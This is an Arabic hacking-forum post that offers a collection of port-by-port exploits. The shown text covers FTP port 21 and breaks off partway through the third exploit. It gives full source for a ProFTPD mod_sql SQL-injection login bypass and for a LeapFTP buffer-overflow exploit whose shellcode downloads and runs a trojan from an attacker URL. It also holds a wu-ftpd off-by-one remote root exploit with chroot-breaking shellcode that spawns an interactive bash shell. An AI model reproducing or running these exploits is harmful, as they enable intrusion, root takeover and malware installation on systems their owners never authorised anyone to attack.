اخلاقي تاج راسي
08-25-2013, 12:07 PM
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
أن شاء الله تكونو في افضل حال
أقدم لكم وأضع بين يديكم البورتات وثغراتها
وللمعلوميه الموضوع حصري على موقع جيوش الهكر
و المعلوميه الثانيه و هي الفماجئة :
عدد البورتات الي اطرحها لكم 114 بورت
يعني يا حبيبي تقدر تقول جميع البورتات ^_*
نقول بسم الله الرحمن الرحيم
نبداء بـ بورت 21
21 ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003
use IO::Socket;
if(@ARGC<2){
print "\nProof Of Concept Sql Inject on ProFTPD\n";
print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
exit(0);
};
$server = $ARGV[0];
$query = $ARGV[1];
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
or die "Can't connect. \n";
if(defined($line=<$remote>)){
print STDOUT $line;
}
# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...
if($query eq "1"){
print $remote "USER ')UNION
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
WHERE(''='\n";
};
if(defined($line=<$remote>)){
print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
print "[------- Sql Inject Able \n";
}else{
print "[------- Sql Inject Unable \n";
}
close $remote;
# [2003-06-19]
21 LeapFTP 2.7.x Remote Buffer Overflow Exploit
/*
,----------------------------------------------------
; LeapFTP remote buffer overflow exploit
; by drG4njubas \\ DWC Group
`----------------------------------------------------
,----------------------------------------------------
;This exploit works against LeapFTP 2.7.3.600
;running on windows 2000 SP3 russian edition.
;Technical details: When LeapFTP requests IP
;and port by using PASV command if pasv mode
;is enabled, it causes the buffer overflow on
;the stack area if server's reply for this
;PASV request has a long IP address:
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
;And this buffer overflow can overwrite a
;Structured Exception Handler on the stack
;area with an arbitrary value by specifying
;the address data over 1057 bytes. If this
;reply contains 0x29 and 0x2E bytes, an
;exception occurs before Structured Exception
;Handler is overvritten and program continues
;it's normal work. Thanks a lot to RaiSe for
;his wonderful shellcode.
`----------------------------------------------------
*/
#include<winsock.h>
#include<stdio.h>
void main(int argc, char *argv[]){
printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,\n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
printf("; www.dwcgr0up.net ;\n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''' '\n");
if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>\n");
printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
return;
}
char exploit[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\x F2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x 08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\x C1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\x F8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x 8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x 03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\x EB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x 7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\x D0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x 03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x 8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x 56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\x F3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\x F4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x 8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x 74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x 04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\x AB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x 33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x 52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x 10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x 55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\x D0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\x D2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x 8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x 90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\x FF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x 72\x6E\x65\x6C\x33\x32\x2d\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x 64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x 6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x 6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x 65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x 65\x74\x2d\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x 08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x 74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x 6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x 73\x63\x2d\x65\x78\x65\x08\x68"
"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x25\x49\xE1"
"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x 83\xD5\xFE\xFF\xFF\xFE\x83\x25"
"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\x FF\x03\x80\xAB\x31\xFF\xFF\xFF"
"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\x FF\xFF\x03\x80\xAB\x34\xFF\xFF"
"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\x FF\xFF\xFF\x03\x80\xAB\x37\xFF"
"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x 39\xFF\xFF\xFF\x03\x80\xAB\x3A"
"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\x AB\x3C\xFF\xFF\xFF\x03\x80\xAB"
"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x 80\xAB\x3F\xFF\xFF\xFF\x03\x80"
"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x 03\x80\xAB\x42\xFF\xFF\xFF\x03"
"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\x FF\x03\x80\xAB\x45\xFF\xFF\xFF"
"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\x FF\xFF\x03\x80\xAB\x48\xFF\xFF"
"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\x FF\xFF\xFF\x03\x80\xAB\x4B\xFF"
"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x 4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\x AB\x50\xFF\xFF\xFF\x03\x80\xAB"
"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x 80\xAB\x53\xFF\xFF\xFF\x03\x80"
"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x 03\x80\xAB\x56\xFF\xFF\xFF\x03"
"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\x FF\x03\x80\xAB\x59\xFF\xFF\xFF"
"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\x FF\xFF\x03\x80\xAB\x5C\xFF\xFF"
"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\x FF\xFF\xFF\x03\x80\xAB\x5F\xFF"
"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x 61\xFF\xFF\xFF\x03\x80\xAB\x62"
"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\x AB\x64\xFF\xFF\xFF\x03\x80\xAB"
"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x 80\xAB\x67\xFF\xFF\xFF\x03\x80"
"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x 03\x80\xAB\x6A\xFF\xFF\xFF\x03"
"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\x FF\x03\x80\xAB\x6D\xFF\xFF\xFF"
"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\x FF\xFF\x03\x80\xAB\x70\xFF\xFF"
"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\x FF\xFF\xFF\x03\x80\xAB\x73\xFF"
"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x 75\xFF\xFF\xFF\x03\x80\xAB\x76"
"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\x AB\x78\xFF\xFF\xFF\x03\x80\xAB"
"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x 80\xAB\x7B\xFF\xFF\xFF\x03\x80"
"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x 03\x80\xAB\x7E\xFF\xFF\xFF\x03"
"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x 6B\x81\x03\x80\x6B\x82\x03\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\xE9\x61\xF9\xFF\xFF";
char *url = argv[2];
if(strlen(url)>80){
printf("ERROR: trojan url is too long!\n");
return;
}
for(unsigned int i = 5; i < strlen(url); i++){
url[i]+=3;
exploit[839+i] = url[i];
}
exploit[839+i] = '\x0B';
exploit[839+i+1] = '\x04';
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);
SOCKET listen_Sock = socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;
addr_Sock.sin_family = AF_INET;
addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
addr_Sock.sin_port = htons(atoi(argv[1]));
printf("Awaiting for connections...\n");
if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
if(listen(listen_Sock, 1))return;
SOCKET victim = accept(listen_Sock,NULL,NULL);
printf("Victim connected...\n");
char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
send(victim, buffer, strlen(buffer), NULL);
while(true){
if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
if(strncmp(buffer, "USER", 4)==0){
sprintf(buffer, "%s\r\n", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)==0){
sprintf(buffer, "%s\r\n", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)==0){
sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)==0){
sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)==0){
sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)==0){
sprintf(buffer, "%s\r\n", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASV", 4)==0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.\n");
break;
}
else{
printf("ERROR: Wrong client or pasv mode is not enabled.\n");
break;
}
}
closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
}
# [2003-07-12]
21 wu-ftpd 2.6.2 off-by-one Remote Root Exploit
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz)
**
** Brute-Force function added.
**
*/
#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
struct os
{
int num;
char *v_nm;
u_long sh_addr;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x 31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\x c9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x 31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x 43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\x c9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x 0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x 89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\x c0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x 62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0(1) compile",0x0806a59c
},
{
1,"RedHat Linux 6.x Version wu-2.6.1(1) compile",0x0806aad8
},
{
2,"RedHat Linux 6.x Version wu-2.6.2(2) compile",0x0806aa60
},
{
0x82,NULL,0x0
},
{
0x8282,"Brute-Force mode",0x0806a082
}
};
void prcode_usage(char *f_nm)
{
int r_n=(NRL);
fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
fprintf(stdout," \t-u [userid] : User id.\n");
fprintf(stdout," \t-p [passwd] : User password.\n");
fprintf(stdout," \t-n [port num] : Target port number.\n");
fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
fprintf(stdout," \t-b : Brute-Force mode.\n");
fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
fprintf(stdout," \t-i : help information.\n");
fprintf(stdout," \t-t [target num] : Select target number.\n\n");
for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
{
fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
}
fprintf(stdout,"\n Example: %s -hlocalhost -ux82 -px82 -n21 -t0\n\n",f_nm);
exit(FAD);
}
u_long null_chk(u_long sh_addr)
{
if((sh_addr>>(NRL)&0xff)==(0x00))
{
return(sh_addr+=(SCS));
}
else return(sh_addr);
}
void ftpd_login(int sock,char *user,char *pass)
{
char send_recv[(GET_R)];
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(!strstr(send_recv,(FTP_CONN_SCS)))
{
fprintf(stdout," [-] ftpd connection failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," ftpd connection success.\n");
fprintf(stdout," [+] User id input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(!strstr(send_recv,(FTP_USER_FAD)))
{
fprintf(stdout," [-] User id input failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [+] User password input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(strstr(send_recv,(FTP_LOGIN_FAD)))
{
fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
close(sock);
exit(FAD);
}
else if(strstr(send_recv,(FTP_LOGIN_SCS)))
{
fprintf(stdout," User %s logged in.\n",user);
}
else
{
fprintf(stdout," [-] ftpd handshake failure.\n\n");
close(sock);
exit(FAD);
}
return;
}
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
{
dir_nm[dr_n]=(gb_character);
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD command failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD command failed.\n\n");
exit(FAD);
}
return;
}
int send_shellcode(int sock,int type,char *dir_nm)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(shellcode_ffx2);dr_n++)
{
dir_nm[dr_n]=(DEF_NOP);
}
for(cmd_f=(NRL);cmd_f<strlen(shellcode_ffx2);cmd_f++)
{
dir_nm[dr_n++]=shellcode_ffx2[cmd_f];
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,(GET_R)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
exit(FAD);
}
return;
}
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
char atk_bf[(GET_R)];
{
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44)); /* 04 */
fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45)); /* 05 */
fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46)); /* 06 */
fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47)); /* 07 */
fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48)); /* 08 */
fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49)); /* 09 */
fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50)); /* 10 */
fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51)); /* 11 */
fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52)); /* 12 */
fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53)); /* 13 */
fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54)); /* 14 */
fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55)); /* 15 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
}
return;
}
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)atk_bf,(NRL),(GET_R));
if(type) /* MKD command */
{
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x4b);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
